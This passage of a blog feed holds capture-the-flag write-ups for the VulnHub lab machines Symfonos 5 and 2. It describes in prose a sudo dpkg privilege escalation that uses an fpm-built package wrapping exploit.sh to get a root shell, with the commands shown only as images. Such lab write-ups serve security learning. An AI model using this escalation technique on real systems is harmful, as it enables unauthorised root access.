/&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;4 - PRIVILEGE ESCALATION&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- User &lt;b&gt;zeus&lt;/b&gt; has got suder privilege for &lt;b&gt;/usr/bin/dpkg&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4Va0RkkXfswWh-Fix4unrksyIueRp0gHQYiY46-EsLDaaVvxq76LnScB972WLg-xGu_LNcAZ_YBty0PrEx3wH1TGkliqdDS2HkKHahIsDWpfjbkI4ebW03NjOBg8VG_VBaHE8C5KA0KEa5C3Ne582n8m7iyi8BkZTg8VKA3JVB2iq2Lu1-69itkJjpA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;142&quot; data-original-width=&quot;659&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4Va0RkkXfswWh-Fix4unrksyIueRp0gHQYiY46-EsLDaaVvxq76LnScB972WLg-xGu_LNcAZ_YBty0PrEx3wH1TGkliqdDS2HkKHahIsDWpfjbkI4ebW03NjOBg8VG_VBaHE8C5KA0KEa5C3Ne582n8m7iyi8BkZTg8VKA3JVB2iq2Lu1-69itkJjpA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;dpkg&lt;/b&gt; is a tool to manage Debian packages, so the idea for Privilege Escalation could to run a &lt;b&gt;deb&lt;/b&gt; package containing a script to run &lt;b&gt;/bin/bash&lt;/b&gt; as a root.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;fpm&lt;/b&gt; builds different types of packages like &lt;b&gt;deb, rpm,&lt;/b&gt;&amp;nbsp;etc..:&lt;/span&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;a href=&quot;https://fpm.readthedocs.io/en/v1.13.1/intro.html&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://fpm.readthedocs.io/en/v1.13.1/intro.html&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Installing &lt;b&gt;fpm&lt;/b&gt;:&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgnXEI2ldQ__Yk-2-oMVsoCVY5-dJ6PNCp_Ihbk2xY_unXyRBgQaSwrHDMg8SOJA0mPl2pWXMy_-3AKxtGj76wCDHG6upfQUvrj-WVoqbDc6PVL-aRnF12ARaCdetLKme1vFWmuMUQbq3ZqODrMyRs3jBKvxiNlQBtt0F0pgo7PajmpOwsaQ3_zYqQ-vQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;691&quot; data-original-width=&quot;547&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgnXEI2ldQ__Yk-2-oMVsoCVY5-dJ6PNCp_Ihbk2xY_unXyRBgQaSwrHDMg8SOJA0mPl2pWXMy_-3AKxtGj76wCDHG6upfQUvrj-WVoqbDc6PVL-aRnF12ARaCdetLKme1vFWmuMUQbq3ZqODrMyRs3jBKvxiNlQBtt0F0pgo7PajmpOwsaQ3_zYqQ-vQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;- Writing a simple &lt;/span&gt;&lt;b style=&quot;font-family: arial;&quot;&gt;exploit.sh&lt;/b&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;:&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBUsVbxk-0aZ7PnT6V98wvq0idqHcAM1BD30AmbZBu05q5gf6VMlc3mM7qZwv3kpCie9FHtOkVQxfkUdMkukpvAYBXW9mabIq2T32vP-hHrpbyt_0rhixScD3aNNLqWrEaeJxnftocN02Y5fkzRRXK9uYp_sDPuKhYc6FVgX7YWsP9oDzF-HLYKOo61w&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;68&quot; data-original-width=&quot;368&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiBUsVbxk-0aZ7PnT6V98wvq0idqHcAM1BD30AmbZBu05q5gf6VMlc3mM7qZwv3kpCie9FHtOkVQxfkUdMkukpvAYBXW9mabIq2T32vP-hHrpbyt_0rhixScD3aNNLqWrEaeJxnftocN02Y5fkzRRXK9uYp_sDPuKhYc6FVgX7YWsP9oDzF-HLYKOo61w=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;fpm&lt;/b&gt; creates a &lt;b&gt;deb&lt;/b&gt; package for &lt;b&gt;exploit.sh:&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4nzdGgnC3yTmNPAOdL5c7opwPk9Po3s73gXIeVkJP2ECK9xfXbq9thH4p3apaAQQYpZqJF05wSKG5jzwaZVXfcQhoXwi7p6aXGHM7c2e0pbwer9HoWb98MMcUJsyBKIhxCh6g_TCasmBbvWh1l0mkeed_JQeA9x17-ZZVucWxi45OGIdgGB1HOLUeqw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;47&quot; data-original-width=&quot;836&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg4nzdGgnC3yTmNPAOdL5c7opwPk9Po3s73gXIeVkJP2ECK9xfXbq9thH4p3apaAQQYpZqJF05wSKG5jzwaZVXfcQhoXwi7p6aXGHM7c2e0pbwer9HoWb98MMcUJsyBKIhxCh6g_TCasmBbvWh1l0mkeed_JQeA9x17-ZZVucWxi45OGIdgGB1HOLUeqw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;clear: left; float: left; font-family: arial; font-size: medium; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;140&quot; data-original-width=&quot;698&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEjwVvrHY2erTtEq3zGc7LqAGAEv-oOPLqQJqSRsahHVhWeIokUxlX67zztmiClV9AZz8VMBC0bR-a9pYTJrWxul2W7BZ9eSa9Aj4Sw1YTYWB_sWxB4HtWM-Dac67L5HMr4YRBdw7o-y1A5hoSpUDL_UH8alSjxpBVSuwL_nLAXvKoKSiwulbGeqQAATYQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Transferring &lt;b&gt;exploit_1.0_amd64.deb&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiUhy5ZJ6NMZ-c1izah5FUtruvgxXvWccMEvly8kj3A3HHjibIMIuw_SHExLpsfN1-9Z79nR3DKGtuXW3wD6x8upl8JBemupXj9pyehN8SF1CSiYp5uCj0YSxmT1zQBQPR3KBYxNacO08874yVIbsnpYlTOYD-k34J76TZ8Ng8F0o0O3thrHZlstjBJpQ&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;48&quot; data-original-width=&quot;482&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiUhy5ZJ6NMZ-c1izah5FUtruvgxXvWccMEvly8kj3A3HHjibIMIuw_SHExLpsfN1-9Z79nR3DKGtuXW3wD6x8upl8JBemupXj9pyehN8SF1CSiYp5uCj0YSxmT1zQBQPR3KBYxNacO08874yVIbsnpYlTOYD-k34J76TZ8Ng8F0o0O3thrHZlstjBJpQ=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg39__yVp4fEMT_Dw8F3OvzUkkKYDSzZcz4cFJ1sTeUnTmbHPMMxTzOUn9gTpgHqmymArioNqcocE0Ogv8dB1O4PZwbTJI1pyZXjq6p9nfD0jf8hGFyeTVn5JnSVgyjiTt8fIOzZrwesyLyFySKCOaSI80jV7WTV2wWfY6x1Is1cUQUDWiSH65gpR949A&quot; style=&quot;clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;268&quot; data-original-width=&quot;872&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEg39__yVp4fEMT_Dw8F3OvzUkkKYDSzZcz4cFJ1sTeUnTmbHPMMxTzOUn9gTpgHqmymArioNqcocE0Ogv8dB1O4PZwbTJI1pyZXjq6p9nfD0jf8hGFyeTVn5JnSVgyjiTt8fIOzZrwesyLyFySKCOaSI80jV7WTV2wWfY6x1Is1cUQUDWiSH65gpR949A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Running&amp;nbsp;&lt;b&gt;exploit_1.0_amd64.deb&lt;/b&gt; with&lt;b&gt; /usr/bin/dpkg&lt;/b&gt; we get a root shell:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiGFZ1SsgXzj4w6uVbCrgIaRbcYYUJwh4w8DUu4c9dB_RgFzgtPh8au3HVCEYXzhQIzL__EVVXgIANBTDOgDjph6V-dmgLupqsNU1GC7Eykjsdd3nO1ogk_kinLaaH3ba_aOwDLffVgfsNdpS2wPp47vDK6IDT4rylHdUO8VXnfzsL6QM3vsA-_V7AQfA&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;143&quot; data-original-width=&quot;789&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEiGFZ1SsgXzj4w6uVbCrgIaRbcYYUJwh4w8DUu4c9dB_RgFzgtPh8au3HVCEYXzhQIzL__EVVXgIANBTDOgDjph6V-dmgLupqsNU1GC7Eykjsdd3nO1ogk_kinLaaH3ba_aOwDLffVgfsNdpS2wPp47vDK6IDT4rylHdUO8VXnfzsL6QM3vsA-_V7AQfA=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;5 - CAPTURE THE FLAG&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Reading &lt;b&gt;proof.txt&lt;/b&gt;:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXrfRkCxS9ZvBfypZiGOd2JPIkMvDmtxE50zLjK0B5UkPvSfd4zqXHYsH7gYZeABIqUgfsJaks-YafLVG-fyVFgqjr54DiFNmhqeUNm6a8iEdLJcHkmOdxY5NPEInnMm-DLdApiTVHTf7AdjWjL0T-yuvUec05JLsY-qrKHhw9LVbcoDhaqhmTkbvqiw&quot; style=&quot;clear: left; float: left; margin-bottom: 1em; margin-right: 1em;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;630&quot; data-original-width=&quot;735&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEhXrfRkCxS9ZvBfypZiGOd2JPIkMvDmtxE50zLjK0B5UkPvSfd4zqXHYsH7gYZeABIqUgfsJaks-YafLVG-fyVFgqjr54DiFNmhqeUNm6a8iEdLJcHkmOdxY5NPEInnMm-DLdApiTVHTf7AdjWjL0T-yuvUec05JLsY-qrKHhw9LVbcoDhaqhmTkbvqiw=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial;&quot;&gt;&lt;span style=&quot;font-size: medium;&quot;&gt;&amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;br /&gt;&lt;/p&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/7881264511459455869'/><link rel='self' type='application/atom+xml' href='https://www.blogger.com/feeds/1947953814412763707/posts/default/7881264511459455869'/><link rel='alternate' type='text/html' href='https://www.whitelist1.com/2022/02/symfonos5.html' title='Symfonos_5'/><author><name>Whitelist</name><uri>http://www.blogger.com/profile/11945670003912610776</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://blogger.googleusercontent.com/img/a/AVvXsEghsO2b3X-NCdl3-8QTAQLurY5-o9xWs0ZdYKgUoyHdNDDagsq8s-rVHWfCxjWyhgbnOb0w_eiSYDBl3qI3SJisXPS1a_zn2p7OWTkY_eTQohSZyWWyS2EdabJvFp4cBqJQj1O8UKnTghzu9pZm2QhaldQD2mYxi1SUz93kLOi8WnHYRwk_uvQ08VclUA=s72-c" height="72" width="72"/></entry><entry><id>tag:blogger.com,1999:blog-1947953814412763707.post-3508809789021788720</id><published>2022-03-01T08:25:00.000-06:00</published><updated>2022-03-01T12:43:05.400-06:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="CAPTURE THE FLAG -   VULNERABLE MACHINES"/><title type='text'>Symfonos_2</title><content type='html'>&lt;p&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc; font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;SYMFONOS 2&lt;/span&gt;&lt;/b&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Layout for this exercise:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZGRCYEo0SxKrzkAkKxzNk3pqwT65DrRqF41hg961V25_jwxK0mTMQURgk581LnFO7nOF-yh8ubjFPKnBMPSH8ZZrfKk_bPp3v9GA3Vt17FUFcCXb0vy82hUhESgAR6irpA3IiLCdAHVC20c3b2Rp8cqS51Pp4xcHuzxZehMIIhW4nDRCmYPcyNFQdJg&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img alt=&quot;&quot; data-original-height=&quot;241&quot; data-original-width=&quot;643&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgZGRCYEo0SxKrzkAkKxzNk3pqwT65DrRqF41hg961V25_jwxK0mTMQURgk581LnFO7nOF-yh8ubjFPKnBMPSH8ZZrfKk_bPp3v9GA3Vt17FUFcCXb0vy82hUhESgAR6irpA3IiLCdAHVC20c3b2Rp8cqS51Pp4xcHuzxZehMIIhW4nDRCmYPcyNFQdJg=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;br /&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;b&gt;&lt;span style=&quot;color: #6fa8dc;&quot;&gt;1 - INTRODUCTION&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&amp;nbsp;- The goal of this exercise is to develop a hacking process for the vulnerable machine &lt;b&gt;Symfonos_2&lt;/b&gt;, from the VulnHub pentesting platform.&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- &lt;b&gt;Symfonos_2&lt;/b&gt; can be downloaded from here:&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;a href=&quot;https://www.vulnhub.com/entry/symfonos-2,331/&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;https://www.vulnhub.com/entry/symfonos-2,331/&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;p&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;- Once the virtual machine downloaded and extracted with VirtualBox:&lt;/span&gt;&lt;/p&gt;&lt;p style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgx1ptjstIOzdtP-axEhrCKjQF80ztuSCri9uPGvTgyo0iWcqAvefP4Ay6dr6dvcCbJJHQTKFM_kizpaLAZL8fYcT9F40ntRIsAtfakriyC9UEZpYfb1l77ziF8Am5iqoyqPZgoaOhLVBoCPKEIhKPhW2ftAkEXWdCrB2S9wmZiqpg7iceqvkY2eshy9A=s293&quot; style=&quot;clear: left; display: inline; margin-bottom: 1em; margin-right: 1em; text-align: center;&quot;&gt;&lt;span style=&quot;font-family: arial; font-size: medium;&quot;&gt;&lt;img border=&quot;0&quot; data-original-height=&quot;194&quot; data-original-width=&quot;293&quot; src=&quot;https://blogger.googleusercontent.com/img/a/AVvXsEgx1ptjstIOzdtP-axEhrCKjQF80ztuSCri9uPGvTgyo0iWcqAvefP4Ay6dr6dvcCbJJHQTKFM_kizpaLAZL8fYcT9F40ntRIsAtfakriyC9UEZpYfb1l77ziF8Am5iqoyqPZgoaOhLVBoCPKEIhKPhW2ftAkEXWdCrB2S9wmZiqpg7iceqvkY2eshy9A=s16000&quot; /&gt;&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: left;&quot;&gt;&lt;span style=&quot;font-family: 